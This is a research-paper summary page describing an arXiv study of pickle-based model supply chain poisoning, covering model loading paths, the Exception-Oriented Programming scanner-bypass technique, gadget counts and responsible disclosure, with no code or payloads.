ML Security PapersThe Art of Hide and Seek: Making Pickle-Based Model Supply Chain Poisoning Stealthy Again
Tong Liu 1,2, Guozhu Meng 1,2, Peng Zhou 3, Zizhuang Deng 4, Shuaiyin Yao 1,2, Kai Chen 1,2
Published on arXiv
2508.19774
AI Supply Chain Attacks
OWASP ML Top 10 — ML06
Key Finding
Achieves ~100% scanner bypass rate across 133 discovered gadgets, and 89% bypass rate even against the best-performing SOTA scanner, earning a $6000 bug bounty upon responsible disclosure.
Exception-Oriented Programming (EOP)
Novel technique introduced
Pickle deserialization vulnerabilities have persisted throughout Python's history, remaining widely recognized yet unresolved. Due to its ability to transparently save and restore complex objects into byte streams, many AI/ML frameworks continue to adopt pickle as the model serialization protocol despite its inherent risks. As the open-source model ecosystem grows, model-sharing platforms such as Hugging Face have attracted massive participation, significantly amplifying the real-world risks of pickle exploitation and opening new avenues for model supply chain poisoning. Although several state-of-the-art scanners have been developed to detect poisoned models, their incomplete understanding of the poisoning surface leaves the detection logic fragile and allows attackers to bypass them. In this work, we present the first systematic disclosure of the pickle-based model poisoning surface from both model loading and risky function perspectives. Our research demonstrates how pickle-based model poisoning can remain stealthy and highlights critical gaps in current scanning solutions. On the model loading surface, we identify 22 distinct pickle-based model loading paths across five foundational AI/ML frameworks, 19 of which are entirely missed by existing scanners. We further develop a bypass technique named Exception-Oriented Programming (EOP) and discover 9 EOP instances, 7 of which can bypass all scanners. On the risky function surface, we discover 133 exploitable gadgets, achieving almost a 100% bypass rate. Even against the best-performing scanner, these gadgets maintain an 89% bypass rate. By systematically revealing the pickle-based model poisoning surface, we achieve practical and robust bypasses against real-world scanners. We responsibly disclose our findings to corresponding vendors, receiving acknowledgments and a $6000 bug bounty.
Key Contributions
- Identifies 22 distinct pickle-based model loading paths across 5 ML frameworks, with 19 entirely missed by existing scanners
- Develops Exception-Oriented Programming (EOP), a novel bypass technique with 9 instances of which 7 evade all SOTA scanners
- Discovers 133 exploitable gadgets achieving near-100% bypass rate against existing model security scanners (89% against the best-performing scanner)
🛡️ Threat Analysis
The paper is squarely about the AI model supply chain — malicious pickle payloads embedded in model files distributed via HuggingFace and other model-sharing platforms. The core contribution is enumerating the poisoning surface and bypassing scanners designed to detect supply-chain-poisoned models at load time. The attack vector is the distribution ecosystem, not weight-level backdoor injection.